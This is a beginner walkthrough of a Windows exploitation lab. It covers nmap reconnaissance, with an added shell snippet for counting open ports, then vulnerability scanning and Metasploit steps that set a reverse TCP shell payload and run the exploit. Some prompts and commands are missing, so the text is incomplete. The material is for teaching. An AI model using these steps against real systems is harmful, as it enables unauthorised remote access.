An educational series on Windows exploitation for complete beginners. A walkthrough.
Task 1: Recon
We start our recon with scanning the target machine using Nmap.
How many ports are open with a port number under 1000?
If you run the scan with the -A flag it will scan all the ports on the host, and we only need port numbers < 1000. It would be better to just specify -p 1000 to scan the first 1000 ports.
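The question only asks for a count, but on a real engagement you usually save the scan and read the answer off the file rather than off the screen. The following POSIX shell snippet is an added example, not part of the original walkthrough: it filters nmap's normal (-oN) output for lines in the "open" state and counts those with a port number below a limit. The scan text is a constructed sample, not a real scan. One caveat a practitioner should know: nmap's -A enables OS detection, version detection, script scanning and traceroute; it does not widen the port range. The range form for the first 1000 ports is -p 1-1000 (a bare -p 1000 scans only port 1000), and -p- scans all 65535.

```shell
#!/bin/sh
# Added example (not the walkthrough's own code): count open TCP/UDP ports
# below a limit from nmap's normal (-oN) output.
# Assumed scan command that produced the file:  nmap -p 1-1000 -oN scan.txt <target-ip>

# Constructed sample of nmap normal output (not a scan of any real host).
SAMPLE_SCAN='# Nmap scan initiated
Nmap scan report for 10.0.0.5
Host is up (0.021s latency).
Not shown: 995 closed tcp ports (reset)
PORT      STATE    SERVICE
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
445/tcp   open     microsoft-ds
3389/tcp  open     ms-wbt-server
49152/tcp filtered unknown
'

# count_open_ports_under SCAN_TEXT LIMIT
# Prints how many ports are reported "open" with a number strictly below LIMIT.
count_open_ports_under() {
    printf '%s\n' "$1" | awk -v limit="$2" '
        # Port lines look like "445/tcp   open     microsoft-ds"
        $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
            split($1, parts, "/")
            if (parts[1] + 0 < limit) n++
        }
        END { print n + 0 }'
}

# list_open_ports_under SCAN_TEXT LIMIT
# Same filter, but prints the matching "port/proto service" pairs.
list_open_ports_under() {
    printf '%s\n' "$1" | awk -v limit="$2" '
        $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
            split($1, parts, "/")
            if (parts[1] + 0 < limit) print $1, $3
        }'
}

# Usage against a saved scan file instead of the embedded sample:
#   count_open_ports_under "$(cat scan.txt)" 1000
echo "Open ports under 1000: $(count_open_ports_under "$SAMPLE_SCAN" 1000)"
list_open_ports_under "$SAMPLE_SCAN" 1000
```

The filter keys on the STATE column rather than on the word "open" anywhere in the line, so "open|filtered" ports and the "Not shown: 995 closed" summary line are not miscounted.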
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)
To get this answer I ran an Nmap script which scans for vulnerabilities on the host:
nmap --script vuln <target-ip>
(replace <target-ip> with the IP address of the target machine)
Task 2: Gain Access
(To do that, type the following command in the terminal:)
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
Show options and set the one required value. What is the name of this value? (All caps for submission)
Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:
set payload windows/x64/shell/reverse_tcp
With that done, run the exploit!
Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell…